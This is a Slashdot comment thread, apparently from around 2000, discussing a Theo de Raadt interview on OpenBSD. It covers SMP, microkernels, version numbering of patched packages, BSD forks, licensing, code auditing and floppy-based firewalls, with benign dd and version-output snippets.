The big "merit" in the "donation" thing is if this allows the organization to receive individual contributions from individuals that wouldn't otherwise be able to "deduct" the payment for tax purposes. While, when you add this sort of thing up across thousands of churches, it adds up to real money, it's not going to be spectacularly worthwhile for a software project that might get $30K in donations and have to spend a chunk of that on organizational costs.

A reply to his reply to my questions. :) (Score:3)

However, some form of resource control is essential to preventing users authorised for one thing from doing something else. ACLs are -one- way of doing this; the schemes described in B1 are another. You're again 100% right that they're not the same thing. However, they both attempt to delineate exactly what a user is and is not able to do. (As for foaming at the mouth, I'm going to go out on a limb here and guess you've met some pseudo-nerds who're drunk on a mix of power & Agent Orange, and who believe that if it's "Official", it's somehow "better" or mysteriously "all-encompassing". I'm not about to start a cult to the Mighty OB1. :) Distributed kernels are kernels which divide low-level tasks between sub-kernels, where each sub-kernel runs on a separate processor or even a separate machine. Distributed kernels are one way of doing hardware-independent parallel processing.
You're not tied to SMP, you're not tied to a single motherboard, you're not even tied to a specific manufacturer. From a security standpoint, it has two major impacts. On the one hand, breaking one component of the system does NOT necessarily compromise any other component. They run on separate CPUs, after all. This means that you can have secure intrusion detection at the kernel level, with secure fail-over to a non-compromised system in the event of intrusion. On the other, you're now ferrying very low-level data across a network of unknown security. The risk of someone compromising the system by compromising the network is obviously much higher than for a stand-alone kernel. Last, but not least, to anyone who may be critical of him: Theo de Raadt is perhaps the most brilliant guy in the BSD world, and I'd place him as one of the top 3 coders in the world. As for his infamous "moods" -- if he's bipolar, HFA or AS, then his moods (and his brilliance) are entirely explicable and nothing to condemn him for.

Re:No plans for SMP... (Score:2)

Exactly. Choice is good. The important fact is that all of these OSes are a mere hop, skip, and a jump from each other. All of them also have their technical advantages as well. And yes, that includes Linux. The beauty is that once compatibility is out of the picture you are free to choose your OS for purely technical reasons.

Re:No plans for SMP... (Score:5)

SMP is plenty interesting to the Linux crowd. They have spent a huge amount of time working on it. The fact that it isn't interesting to Theo and the folks working on OpenBSD simply highlights one of the benefits of the Open Source way of getting things done. If you start your project on OpenBSD and decide that you need SMP to get the performance you need, "porting" to Linux shouldn't be much harder than moving your source to a Linux box and typing "make."
If, on the other hand, you develop on Linux and then decide that Linux's security isn't good enough for implementation, you can just as easily port to OpenBSD. There is never going to be an Uber OS that is specialized for every task (although the generic Unix way of recompiling the kernel does come close). That's why standardized APIs are so important. That way you can change your OS midstream if it isn't giving you what you need. The Open Source community has done a pretty good job of matching up APIs.

Re:No upstream (Score:2)

OpenBSD is not "300MB of source" that Theo thought up. There's quite a bit -- likely a majority -- of stuff brought in from other coders *WHICH RETAINS IDENTICAL VERSION INFORMATION*. Go query Perl. Or vi. Or httpd. They're all external packages, with their own internal version. If Theo wanted to reversion them to "Perl OBSD 2.8" and "Apache OBSD 2.8" and so on, that's fine. But that Perl ain't 5.6.0 unless it was built from the 5.6.0 tree. --Dan

Re:No upstream (Score:2)

Now, why would I put the question to the number one distribution known for doing it right, when everybody else does it too? To redefine that which is known as "doing it right", so we don't get any more Debian Secret Backported Bugfixes. :-) --Dan

Re:Theo: Version Number Specifics (Score:2)

Yes, I can definitely hunt down the changes, and Theo is well within his rights to change the source. Hell, I'm thrilled he's fixing problems. But should I have to check a changelog to know there's a change? That's the bottom line question. Should not a version reflect a snapshot of code? Should I not be able to trust a given codebase by its version alone, rather than have to audit the source by hand? If a version *doesn't* refer to a snapshot of code... well, what does it refer to? --Dan

Re:Security... (Score:2)

Because I wanted command completion. What, you think sh is the height of security?
Among other things, *any* shell can be trojan'd to attack, replace su, or even

You are correct, of course. Most things shouldn't be done as root. I could theoretically have checked versions without it. This is somewhat on the order of a spelling flame, but I'll take it in stride. As for my qualifications, feel free to scan my BugTraq posts, and thank you for helping to prevent my ego from growing too large.

Yours Truly,
Dan Kaminsky
DoxPara Research

Re:No upstream (Score:2)

Still, I question if the version number should stay stable. Suppose, for a moment, that the rest of the world finally discovers major holes in 5.6.0. Should OpenBSD administrators have to root around the Changelogs to realize they're running a safe build? Wouldn't it be better for them to be running 5.6.0_OB2.7 and see that, heh, the Changelog shows that the new stuff protects them?

===
$ perl -v
This is perl, v5.6.0 built for sparc-openbsd

$ perl -V
Summary of my perl5 (revision 5.0 version 6 subversion 0) configuration:
  Platform:
    osname=openbsd, osvers=2.7, archname=sparc-openbsd
    uname='openbsd'
    config_args='-Dopenbsd_distribution=defined -dsE'
  Compiler:
    cc='cc', optimize='-O2', gccversion=2.95.2 19991024 (release)
    cppflags='-fno-strict-aliasing -I/usr/local/include'
    ccflags ='-fno-strict-aliasing -I/usr/local/include'
    stdchar='char', d_stdstdio=undef, usevfork=true
    intsize=4, longsize=4, ptrsize=4, doublesize=8
    d_longlong=define, longlongsize=8, d_longdbl=define, longdblsize=8
    ivtype='long', ivsize=4, nvtype='double', nvsize=8, Off_t='off_t', lseeksize=8
    alignbytes=8, usemymalloc=n, prototype=define
  Linker and Libraries:
    ld='ld', ldflags =''
    libpth=/usr/lib
    libs=-lm -lc
    libc=/usr/lib/libc.a, so=so, useshrplib=true, libperl=libperl.so.6.0
  Dynamic Linking:
    dlsrc=dl_dlopen.xs, dlext=so, d_dlsymun=define, ccdlflags=' '
    cccdlflags='-DPIC -fPIC ', lddlflags='-Bshareable '

Characteristics of this binary (from libperl):
  Compile-time options: USE_LARGE_FILES
  Built under openbsd
  Compiled at May 5 2000 12:35:29
  @INC: .
===

Re:No upstream (Score:2)

YES! It IS! It's too hard for me to read the source code to every app I run. I admit it. I want to trust Theo. I want to believe his prying eyes are protecting me from danger. I don't *want* to have to go diving into the code he writes or even the fixes he claims when a new vulnerability comes out. I want to know: Is this the exact same code that is vulnerable everywhere else? Then upgrade. Is this NOT the exact same code, and therefore I should check the Changelog? I'm not asking a lot. I'm merely asking the question: What do version numbers mean, if they *aren't* snapshots of code? --Dan

Re:No upstream (Score:2) --Dan

Re:No upstream (Score:2) --Dan

Theo: Version Number Specifics (Score:5)

I don't think it's fair to say, as you did, that "ftpd is ftpd" or "tar is tar" for all of OpenBSD. Examples from version lines throughout OpenBSD:

spork# perl -v
This is perl, v5.6.0 built for sparc-openbsd
bash-2.04#
GNU troff version 1.15
bash-2.04# nawk -V
awk version 19990620
bash-2.04# gcc -v
Reading specs from
gcc version 2.95.2 19991024 (release)
bash-2.04#
Concurrent Versions System (CVS) 1.10.7 (client/server)
vi Version 1.79 (10/23/96) The CSRG, University of California, Berkeley.
bash-2.04#
tcpdump version 3.4.0
libpcap version 0.5
bash-2.04#
Server version: Apache/1.3.12 (Unix)
Server built: May 5 2000 14:44:59

Look. Some of these you modified. Maybe all of 'em. Maybe one of 'em (I *know* you touched Perl.) Let's take the example of tires, why don't we. If I've got Firestone Model X432LFR tires on my car, and I run down to the dealership asking why I'm driving a deathtrap, is he allowed to laugh at me because "Of course *we'd* never put the deadly X432LFR tires on your car, we'd only put the *good* X432LFR tires on! Stupid customer." That's essentially what happened with Debian a while back, and it was infuriatingly unfair. I'm not asking you to do more work, Theo -- you've *done* the work.
I'm asking you to admit it, mark it, brand it in such a way that we know you've been forced to do something to it to make it secure. And then all of us can bitch and moan to the authors of whatever package you've taken and say, "Heh, he changed your stuff, maybe there's something you should look at." Maybe we'll be ignored. But, in the end, *you* did the right thing. Theo: You and your team rewrote much of an early build of SSH. Technically, you could have said, "Here's SSH 1.2.1x, as part of the OpenBSD system." But then nobody would have known what you had pulled off, and people would have had trouble finding your specific improvements. I'm not saying you need to rename every package to show how much you've added. But to keep the original version numbers is to conflate your secure and solid version with whatever bugs you *know* lurk in other people's code. When Foobar 1.2 comes out with a remote root, and OpenBSD ships with Foobar 1.2, do you like -- or enjoy -- when system administrators frantically upgrade your *already fixed version* of Foobar 1.2 with the original author's possibly broken Foobar 1.3? Because that's what your version numbers cause. They're easy to fix, Theo. It's just a tag to let us know you fixed something. It's something for us to differentiate your code with. (Incidentally -- what(1) does little on my 2.7 Sparc build.) Consider this: As much as you say you've only dealt with the system, I *know* many of the packages from Ports have had patches that didn't modify version numbers -- and I have *no* idea if anything's been modified in your packages section. I just don't know. This is not a problem specific to you, but I think OpenBSD is in the right place to change what I consider to be a particularly pernicious industry practice. I believe in your systems approach, but a secure system cannot be built from insecure parts. If you've secured your parts -- show this, and perhaps let us know where to look to find out how.
Yours Truly,
Dan Kaminsky
DoxPara Research

Re:Theo and Microkernels (Score:2)

What userland protection helps is stability; less code that can deref a bad pointer, etc. What it can't help is the quality of the code. At the end of the day, an attempted attack will try to make the code make the wrong decision; i.e. allow something to happen that shouldn't have, or do something it shouldn't have. That has nothing to do with whether or not it causes a segfault somewhere else. Although some attacks could make monolithic kernel code do something to other code segments somewhere else, it really isn't all that likely or often used. Attacks tend to be against making code call the wrong routine, set a variable the wrong way, etc. That stuff can't be helped with microkernels. Sorry, all microkernels are really good for are (1) loadable features (no recompiling), (2) crash protection. But, they do the traditional tradeoff of speed for it (multiple context switches for a single system call, etc.). But, anyone else get the feeling that a good portion of the questions Theo did respond to were all asking the same thing: what common errors do you end up fixing? Not a horrible question to answer by far. Sure you could say 'bad code,' but a list of good examples of security-critical mistakes is far more helpful. --

"But it works." (Score:3)

See also: the "HTML" on the supposed "geek web site" called Slashdot. (As well as, to be fair, the rest of the web.)

Hey, where's my question? (Score:3)

Mac OS X & BSD [slashdot.org] I'm curious about how the BSD folks view the impending couple million new users they've got heading their way when MacOS X is released. Please, no Mac-rants, they're trite & off-topic. I just wanna know about the question.

Re:Forks are Good! (Score:2)

No upstream (Score:4)

As a Linux user, one comment Mr de Raadt made surprised me: In Linuxland, cat is GNU cat, tar is GNU tar, httpd comes from the Apache project, rpm comes from Red Hat, and so on.
There is always an upstream maintainer for any particular package and no distributor (AFAIK) tries to maintain its 'own' releases of things. If a bug is found, the fix tries to swim upstream to the breeding ground, where it can add itself to the gene pool for future releases of all distributions. (Alas, I do not have a ten-man team auditing my comments for dodgy metaphors.) I suppose it makes sense in a way to have your own codebase, especially if you are concentrating more on security than on adding new features. You have control over every line of code that goes in, and you don't mind missing out on new versions of stuff that is released. Also, if your original 'upstream source' is a group of people you split acrimoniously from, you might prefer not to rely on them. (Although I can't help feeling that if the OpenBSD and NetBSD people made more of an effort to commonize code in both directions, the feud wouldn't have lasted as long. This sort of thing going on between two Linux distros -- e.g. Mandrake and Red Hat -- would be unthinkable.) But not relying on an upstream maintainer for packages does not mean you can't contribute your fixes back. All the BSDs originate from a common code base, right? There must surely be at least 95% common code in the shell and shell utilities (which change relatively slowly), even if the kernels have diverged. So what effort do they make to avoid reinventing the wheel? And when OpenBSD fixes a set of bugs, do they report them to the maintainers of the original package? Perhaps the problem would be that they couldn't agree on who should be the original source. Imagine if NetBSD claimed that they were now the 'official' maintainers of BSD make, for example. Would OpenBSD accept that? Perhaps some neutral 'BSD Foundation', with support from all three free BSDs, could take over maintenance of the common or fairly-common BSD code. Or somebody from Berkeley (Bill Joy perhaps?) could make a ceremonial proclamation.
About a secure ports tree (Score:2)

Re:This is ridiculous. (Score:2)

Perseverance is not always a sign of strength or skill. Once you learn how to add, you move on to multiplication. I have a similar tendency to like DOS. I have spent a whole lot of time playing with it, and am not afraid to say that I know it well. DOS is very simple, but very stable, meaning that there is rarely anything new for it. I know that the latest version of Norton Utilities for DOS will be 8.0, and the latest version of NC will always be 5.0. I know how to fix things in it. However, I also know that it is old and not good, which is why I don't use it anymore (except for the occasional 5-day contract at some company with a bunch of 386es). I am instead trying new things. Single-processor x86 Unix and C are nice and safe. SMP is new stuff, and you no longer feel warm and comfy there, sort of like getting out of bed on a winter morning. But you have to get out of bed... that's the way the whole thing works. :-) --

Re:Working with microkernels (Score:2)

Microkernels are just a whole lot more work to implement... they don't have the resources or the interest. I think OpenBSD just wants to produce a simple and secure BSD variant for uniprocessor micros... not be the Ultimate OS. "Free your mind and your ass will follow"

Theo misses a point (Score:3)

The point of a floppy-based system (firewall/router, et al.) is not to use the floppy, but to make it simpler to configure than "BOOTP/Diskless". In a floppy-based system like that (firewall), the floppy would be used to boot the host, that is all. The goal is to have *NO* disks, or any other moving parts.

Re:No upstream (Score:2)

If I need to get the code difference I use diff, either on the OpenBSD source tree or the Debian source tree. But when there comes a security hole, it's usually a note on what OS the hole works on. If a patch exists, the time to find out if one needs to add the patch is usually very small.
(Actually it's seldom an upgrade to this new version that has this fix and all these new features...)

Re:GPL? (Score:2)

Re:BAH! (Score:2)

Question: How do I become a good referee? Answer: I suppose the best tip is to go to a lot of fights. (Even though one could wonder if this fits boxing.) / Balp

Re:Pizza 'n' Beer (Score:2)

Pizza maybe, I've never seen beer associated with geekdom. Bunch of namby-pambies with their Jolt Cola usually. I prefer to code with a nice thick Guinness in hand (though not with pizza; I like Fat Tire with my pizza). For the record, I also hate twinkies. --

Re:Theo and Microkernels (Score:2)

In theory. In theory, microkernels could just swap out pieces of the system for independently developed implementations, and a change in one component need only affect that component (orthogonality). In practice, microkernels tend to just replace function calls with messages, and their components remain as tightly coupled as ever, so a failure (such as a security flaw) in one will tend to cascade to the other components in the system. Projects like OSKit offer hope for a more orthogonal OS design, but I'm not holding my breath. --

Re:But he doesn't follow his own advice (Score:2)

An all-too appropriate word, considering the word means "nowhere". Show me paradise in any OS today. Lead me to the Buddha in the machine. --

Re:Where the money goes (Score:2)

Just because Americans can't make beer that doesn't taste like mouldy water doesn't mean that Canadians are equally challenged. Next time you're up in the great white north try and get your hands on something made by Big Rock breweries of Calgary. That's good beer. Never heard of them. Just as you've likely never heard of Left Hand or Wynkoop or Broadway Brewing or any of the HUNDREDS of craft breweries in the US, probably an order of magnitude more than any other country in the world.
Those are just three, in Colorado alone (home of Coors, lightly flavored spring water in a can), that I could name off the top of my head. We all carry six-shooters and wear Stetson hats too, you know? --

Re:filtering by FreeBSD/NetBSD (Score:2)

YHBT. HAND. This guy you responded to is a troll who posts the exact same post in every single BSD article. Just ignore him; he's just another reason I normally browse at threshold 2 til I get bored. --

Re:A reply to his reply to my questions. :) (Score:2)

Bill Joy was one of the original authors of BSD. And vi too (*sigh*). --

Re:Mr.Sparkler (Score:2)

So that he doesn't get taxed as a for-profit business. Non-profit doesn't mean you can't draw a reasonable (or even comparatively handsome) salary if you choose to take one. --

Re:why bother? (Score:2)

You want documentation written by people who needed the documentation in the first place and didn't get any? Neat trick. I think I'll write a treatise on nuclear physics in order to teach myself. See Dick --

Re:why bother? (Score:2)

--

Why you should be afraid of forking. (Score:3)

snip Why are you guys so fork paranoid? Looks to me like you've already answered your own question, Theo. -

Before flaming Theo ... (Score:5)

And what's wrong with that? OK, he's no "Dear Abby", but neither is RMS. I know many here aren't big RMS fans, but are you insecure enough about your own little world that when someone says, "Quit bothering me with stupid details, just write the code" you start flipping out? I attended Supercomputing '99 and went to a talk by Thomas Sterling, one of the original Beowulf pioneers at NASA. A good chunk of his talk was spent complaining about "Linux cruftiness" and "why are you people here when you could be writing code"? I admit I was somewhat pissed coming out of it, but it did have the effect of motivating me to start programming again. I think sometimes we just need a swift kick in the arse from someone (hi Greg!) to get motivated.
Bottom line: ignore the stupid "Are you mad?" comments from someone whose ego is a bit too big to take the time to be polite, and focus on the "learn your APIs, understand your APIs, and stop writing shitty code." Learn the message, ignore the messenger. -jdm (I'm ready for my big Mod-down, Mr. Director :)).

Missing the point on floppy-based routers? (Score:5)

Flash RAM would be preferred, but flash disks are hardly ubiquitous, and free-for-the-taking x86 systems that work great as routers don't generally have flash-based disks installed. A floppy drive is almost a given in any system. The hardware advantage of a system without a hard disk is the reduction of heat generation, meaning they're easier to put in heat-hostile environments like telephone closets. System upgrades are a snap, since you just move the disk to another platform. As far as security goes, other than floppy disks' general lack of reliability, what's the problem with them? They're physically write-protectable, which many IDE disks aren't. Sure it's easier to swap a floppy out than a HD, but if your machine doesn't have physical security to begin with you've failed the first checklist item for security.

BAH! (Score:3)

Question: Any advice for code auditors? Theo: I suppose the biggest tip would be to become a better programmer. Bah Humbug! That's equivalent to: Question: How do I become a better sprinter? Theo: I suppose the biggest tip would be just to run faster.

Re:No upstream (Score:2)

In addition, every package has a Debian.changelog that should have information about what changes have been added in the Debian version.

Yeah kinda how the 'original' unix forked... (Score:2)

Unneeded complexity is bad, mkay?

GPL? (Score:2)

Re:This is ridiculous. (Score:3)

Maybe being able to use a system as a firewall/gateway that makes me sleep at night because I feel confident that it will not get h4X0red. I really don't give a fsck if it doesn't have SMP support. What's the REAL percentage of online SMP boxes anyway?
I'll admit that it is really nice (and useful), but I'm sure there's a majority of sites that simply don't need it (yet). --------------------------- "What is the most effective Windows NT remote management tool?

Re:I/O bound? (Score:2)

That's the key point - I wouldn't really use OpenBSD for what you describe; probably one of the commercial unices which are tuned to the specific multi-proc hardware that they run on. For x86 and single-proc Sparcs though (the only archs I've used OpenBSD on), it rocks hard! SMP would be 'nice', but certainly not something I'd lose sleep over not having. Also, I would prefer it to be implemented properly, and not with horrible global kernel locks lying all over the place.

Re:This is ridiculous. (Score:4)

Uh, right. So go ahead and write an entire operating system in a new language then. Don't forget to design the language first though! Remember the C-bashing thread on Bugtraq over the summer? Whatever its limitations, we are stuck with C. 2. The proper approach seems to be a very limited operating system, perhaps in C, with a virtual machine over that which is proven secure, thereby giving at least strong security to every application then running on top of that VM. Nice theory, much like many of the other 'ground-up' papers I've read. And meanwhile, while you sit posting and postulating on the great designs that will rule the operating systems world, I'll just use OpenBSD, and be happy with the stability and reliability of the system. Perhaps I'll look you up in ten years when you've finished this idea? What is the point? Why bother if you aren't even going to put in SMP? I really, really don't care whether or not OpenBSD has SMP. If I need a faster box, I'll just upgrade to a faster processor. The majority of server systems these days are either I/O or connectivity bound.

Re:So You WANT to Be Exploited? (Score:2)

Why are you so shocked? It's BSD. It is NOT exploitation. Nothing is stolen.
The CVS repository does not disappear when a commercial company uses the software it contains. The people behind a given project continue to work on their project. That does not suddenly stop because some company is selling it or something based on it. 6 months later the project releases a new version. The company is still behind. They could work on it from the point they started using it, or they could use the new release. Since they have to keep tracking new releases anyway, they could even (and many do) help by giving their changes back to the project. And even if they don't (and many do), the project members spent those hundreds of hours of work doing what they loved and couldn't care less what some company does. They want the fruits of their labor to fall into as many hands as possible. BSD allows and encourages that. GPL zealots are hypocritical. If you're so worried about The Man making money off of you, why are you writing free software? Tell me, would you rather write free software because you WANT to or because you HAVE to?

Re:This is ridiculous. (Score:2)

That's a good point about firewalls; that's an important use of this OS. However, I would have thought it would be easier to lock down a firewall machine with the existing OS than audit the whole thing? It's my understanding that this audit will attempt to make the OS more secure for more "dangerous" tasks, where more ports need to be open, more applications are running and generally the machine is used for more things. In that case, then I think SMP starts to become a necessity for any major server OS, otherwise it'll never be put on any of the really big machines that could benefit from all the enhanced security.

This is ridiculous. (Score:4)

Here's the main point, before we even get started: This project should be scrapped; there are easier and better ways to do what is being done here. Now the reasons. 1.
The fact that you need to go back and hand-audit libc calls for "subtle" errors means that the wrong language is being used for the majority of these tasks. For these types of ultra-secure tasks, there should be extremely limited cases, and ideally no class of errors that would be "subtle" when it comes to standard library calls. I would suggest that C is not a good language to write a secure operating system in, because it very obviously requires too much manual labour to weed through the subtleties of its operation. 2. The proper approach seems to be a very limited operating system, perhaps in C, with a virtual machine over that which is proven secure, thereby giving at least strong security to every application then running on top of that VM. Yes you'll need to audit that first limited OS and kernel, and yes it'll probably be in C, but let's limit the scope of that code severely. Plan to take a huge performance hit on running everything on that VM, but make sure that it's totally secure; do whatever it takes to make sure that everything running on it is protected from itself and other programs. This is the only possible way to make an extensible operating system that is in any way secure; otherwise any software that is later added to the system will either need to be painstakingly audited or not installed. Performance should be a minor concern at this point as VMs can later be optimized, and security should be of prime importance. 3. After they finish all this auditing, we're left with a non-SMP-capable OS with limited software of a similarly secure nature to use it with. What is the point? Why bother if you aren't even going to put in SMP? 4. Theo is obviously so closed-minded that no efficiency ideas are ever going to occur to him. Witness his response to the question about distributed kernels - (in summary) "I have no idea what they are, but they're not useful to me." Great.
It is my opinion that people of this caliber of programming should be spending their time doing more useful, or perhaps better thought-out work. Moderate at will.

Re:Hey, where's my question? (Score:2)

Quite simply, it's about like asking him what he thinks of some large company deploying BSD/OS. The users aren't heading at Open/Net/FreeBSD, they're heading at Apple. Not like Theo's gonna get any emails from Joe Machead asking him how to change the system event sounds in OS X or anything.

Pizza 'n' Beer (Score:2)

In any case, lately I've noticed that a lot of computer geeks have been trying very hard to shake that reputation, image, and social stigma. The modern "tech boom" has created this new social respect for people who used to be misunderstood, and so many of these people (luckily not including me) have been trying very hard to shake those easily caricatured "typical geek behaviors" while they have their time in the sun. I'm glad to see traditional geeks, down to caustic remarks about other people's coding (who else but a geek could get that worked up about it, that it's a personal matter!). I'm glad, it makes me smile, 'cause that is the sort of person who made life interesting for me as a young geek, and hell, I hope they are around forever...

Re:BAH! (Score:2)

If you think you can become a world-class runner by "just running" I think you are sadly mistaken. Besides, he even mentions that many programmers learn how to do it poorly, but when asked how to learn to do it correctly, he says, just do it. Overall this is a pretty shallow interview; it's obvious he'd rather be coding than answering questions. A good thing for OpenBSD the software, a bad thing for the image of OpenBSD. $.02 --

Re:So You WANT to Be Exploited? (Score:2)

BSD advocates believe, I think, that given a choice between X for free and X' for a price, X' will cost only what the added value of the ' is worth. I would like to agree, and in a perfect market I would agree.
But there is no perfect market in the world today. People, being morons, are quite happy to pay $x for X', where $x is the total value of X', not simply the added value, even though economically it would be smarter to use X for free, getting all the functionality of X' save ', but saving an amount of money equal to functionality(X)+'. People are the problem. The GPL is a nuisance, I agree. If this were a sufficiently more perfect world then I would most definitely use BSD. But it's not, and thus I don't. The BSD license allows more freedom--that's a good thing. But the GPL protects freedom. The one is like three acres of apples, exposed to the birds and the beasts. The latter is like an acre of apples, with farmhands to scare away the animals. At the end of the day, the tended land has more apples. Thus with the GPL.

Re:I would've asked about automation of analysis.. (Score:2)

Automated code modification would lead to a situation where the developers would just sit around and think of vulnerabilities, rather than having to look over the same code 14 times, and get to know it. There is something to be said for forcing yourself to pore over every line, every bracket, every semicolon of the code, and check everything. From what Theo said, it sounds like while they are fixing one sloppy piece of code, they note another bit when they are part way through. This makes lots of sense. Where are they going to find new mistakes if they don't go through all the code? This is not just off the top of my head, btw. I write scientific code that has to be correct, where there is no way of testing the output. It's amazing how often subtle bugs are missed. --

Re:Forks are Good! (Score:4)

I suspect that the question was rhetorical, but it deserves an answer. I'm putting it here, with the other fork comment, even though it wasn't written as a follow-up to that comment. Simply put, it's (too) often used as an object lesson in Linux land.
Whenever an argument gets too heated, someone jumps in with "if we keep acting like this, we'll end up like the BSDs." Meaning, I suppose, "fighting over a very tiny percentage of mindshare instead of working together to take over the world." I suspect that Linux is headed toward a fork. Linus and Alan Cox have been leaving things out of the kernel (like a debugger) that a lot of people want. As there's no charter or formal organizational structure, I think that a coup of some sort is inevitable. When it happens, the interest in the Net/Open split will rise to a crescendo. I have friends who are OpenBSD advocates, and others who are NetBSD advocates. To hear each side talk, the other side writes crappy code between bouts of trying to ruin BSD for everybody. It's depressing, particularly when I think about what could happen if their talents could be combined. Or, if they would just shut up, stop sniping at each other, and code. I'd love to see some sort of cross-bsd advocacy organization to help users take that middle step. Help with porting of cool shit between the BSDs. Make generic cross-BSD documentation. Help people decide which OS and user/developer community is right for them. etc. Unfortunately, that requires a friendlier attitude than I often see between the BSDs. Charges of "code theft" particularly frustrate me. That's the whole damned point of open source: Seeing the good stuff, learning from it, and using it. -- Re:distributed kernel ... (Score:3) Re:Where the money goes (Score:2) I'll agree that the US and Canada can't seem to make a decent beer... the US has a real bad track record... midwest megabrews, Natural Light, Utica, Keystone, anything that says 'ice', etc... Of course, the Guinness doesn't taste as good here in the Midwest, either... -- Re:Where the money goes - Totally OT (Score:2) I know of many pubs that brew their own stuff on the East coast, and it's worth the trip. 
--

Re:Where the money goes (Score:2)

My favorite Canadian beer is Elsinore, since I found a mouse in the bottle... --

Re:No plans for SMP... (Score:2)

As for the UberOS(TM) - That's where the ideas of microkernels and modules really come into play. Granted, there are always tradeoffs, but theoretically, a microkernel is infinitely adaptable... --

Re:No plans for SMP... (Score:2)

I wouldn't blame IBM for this, but then again, they give me a piece of paper twice a month... that, and I've seen [CENSORED - IBM Confidential]. So there! --

Re:Missing the point on floppy-based routers? (Score:3)

It seems very difficult to obtain the same characteristics from a hard disk (or flash RAM); I don't know how to physically prevent writing on a standard IDE HD. And if you use the HD just to load the FW into RAM, and "hot-swap" it out, then it won't come back up after power failure (even UPSes have their limits). Floppy disk reliability is not much of an issue, I think, since the floppy isn't used as a long-term storage medium. Remember your friend dd:

$ dd if=/dev/fd0H1440 of=floppy-image
2880+0 records in
2880+0 records out
$ dd if=floppy-image of=/dev/fd0H1440
2880+0 records in
2880+0 records out

"The first dd makes an exact image of the floppy to the file floppy-image, the second one writes the image to the floppy." (SAG v. 0.6.2) (And of course, one can always mount the dd image; "mount -t ext2 -o loop".) So you develop, maintain and store the actual FW information on another box, then write the image to a floppy (making a backup fd image on the development box). All the floppy has to do is to survive the initial boot. It may have to survive reboots caused by power failure, but even if it does not (hard disks may fail too), a disaster recovery plan is part of the floppy-disk-based FW scheme; just write a new image, and boot. How many HD-based FWs have a spare hard disk with a synced and updated system on it?
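The dd workflow described above can be sketched end-to-end. This is a hedged sketch, not part of the SAG quote: the real device (/dev/fd0H1440) is replaced by a plain file so the script can run anywhere, and a checksum comparison is added as one way to confirm the written copy matches the master image.

```shell
#!/bin/sh
# Sketch of the image-and-write-back workflow for a floppy-based firewall.
# FLOPPY stands in for /dev/fd0H1440; on a real box, point it at the device.
set -e

FLOPPY=./fake-fd0
IMAGE=./floppy-image

# Fake a 1.44 MB floppy (2880 sectors of 512 bytes).
dd if=/dev/zero of="$FLOPPY" bs=512 count=2880 2>/dev/null

# 1. Take an exact image of the floppy.
dd if="$FLOPPY" of="$IMAGE" bs=512 2>/dev/null

# 2. Write the image back to a (fresh) floppy.
dd if="$IMAGE" of="$FLOPPY.new" bs=512 2>/dev/null

# 3. Verify: the written copy must be bit-for-bit identical to the image.
sum1=$(md5sum < "$IMAGE" | cut -d' ' -f1)
sum2=$(md5sum < "$FLOPPY.new" | cut -d' ' -f1)
[ "$sum1" = "$sum2" ] && echo "image verified" || echo "MISMATCH"
```

On a real system, step 3 is the cheap insurance against a worn-out floppy: if the read-back checksum doesn't match the master image on the development box, write a new disk before deploying it.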
If you have just a slight suspicion that the FW is compromised, then a reboot will flush out any trojans and root kits. The firewall may still contain some sort of security hole, but rebooting may give you time to discover what the hole was, and deploy a new FW. A floppy-based firewall is a very cool thing. It doesn't fit everybody's need, but it may be a viable solution for a great many. CD-ROMs may offer similar advantages, but they may be slightly more difficult and expensive to develop and maintain. In short: firewalls on write-protected media seem to be a very good idea.

Re:Missing the point on floppy-based routers? (Score:2)

It's interesting that someone as massively detail-oriented as Theo de Raadt seems to be shooting from the hip so much when just talking/typing -- maybe Katz should write an expose about detail-oriented people being sloppy and neo-Luddite Harper's readers in their off hours.

Design vs. Implementation (Score:3)

He then goes on to say that he really doesn't care about kernel design, so long as the kernel design works. These two issues are completely different. Let's face it - he's an implementation junkie. Which I would guess was not, and still is not, popular with the NetBSD crowd, as he probably had to step on a few toes... 'You're not using strcat correctly. You've introduced 6 exploitable bugs into the kernel' 'What do you mean I'm not using strcat correctly?? I've been coding since I was twelve years old!' Cyano

Forking (Score:2)

I just have to point out the flaw in this reasoning. A political party represents a unique ideology in an abstract sense. A fork also represents a unique ideology, but in a practical sense. If you're a Democrat, you believe in welfare. If you're an OpenBSD developer, you believe in security AND you develop software towards that belief. The problem with too many forks (not that some aren't good) is that it thins programmer resources.
The differences in implementation between two forks are, by definition, going to cause incompatibilities between them, meaning at some level programmers have to "choose sides" and decide which ideology to develop for, or do LCD compatibility. If you get too many forks in open source, it will be impossible to maintain the critical mass of programmers necessary for providing a comprehensive library of software which takes advantage of the specialties of any single system. In a political party, on the other hand, while many parties exist, "development" (i.e. practical implementation of ideology) is only going on in ONE place: the government. Your analogy would be more like if each political party decided to take over a different part of the US and declare itself sovereign, which is at this point clearly unproductive and inefficient given the way the US has adapted itself to function well as a single entity. The corrected analogy carries through well; in other countries we have good forks, which represent ideologies so different that forking is inevitable and staying together would be a resource drain. Of course, these things are self-limiting; an unnecessary fork will simply not be able to survive for long, or one of two similar projects will eventually end up gaining dominance and reducing the other one to a minority. The point is, forks are only good sometimes, and it's got nothing to do with political parties.

What is a "black hole route"? (Score:2)

What exactly does this mean? That packets from openbsd.org to netbsd.org are just swallowed without trace?

Re:Missing the point on floppy-based routers? (Score:3)

md5sum the whole floppy[*]. On booting, if the floppy image does not have the same checksum, abort. Then it's possible that the router might not boot one day, but it's impossible for the disk to corrupt without you noticing. [*] OK, md5sum all of the floppy apart from a file containing the md5sums.

Re:This is ridiculous. (Score:2)

Do it right! (Score:5)

Hear, hear! Two of my pet peeves right there: (1) Why is it that the same bugs keep reappearing? Why is it that we assume bugs only occur in one place? Why is it that we hear, "I fixed the bug," as if a programmer can only screw up in one place? (2) Every other piece of engineering goes through major scrutiny. Teams are brought in from the outside to look over blueprints. For open source software, we assume that just because anybody can look at the code, everybody is. Even in OSS, we need to go to outside, objective reviewers and say, "Here's some money, and here's our code [or maybe, here's the URL for our code :-) ]. Please review it and tell us where we screwed up." Mr. de Raadt knows his stuff; the coders do this themselves, and they take it seriously.

charitable donations (Score:2)

(And I must ask, why are people so cheap, that they only give donations when it provides a partial reduction in their taxes, rather than a real donation? I actually find that pretty fake.) Econ 101, Theo. It provides you with more money if people don't have to pay taxes on the money that they give. It's the same way that sales taxes are split between the store and the consumer, simply because in the absence of sales taxes, the store could charge slightly more for a product. Don't make me start drawing supply & demand curves. Michael

Re:What is a "black hole route"? (Score:2)

I have entirely no knowledge of what events occurred between the two groups or whether they were fighting over a network and its routes, but that's the usual meaning.

Hey! I've got an answer! (Score:2)

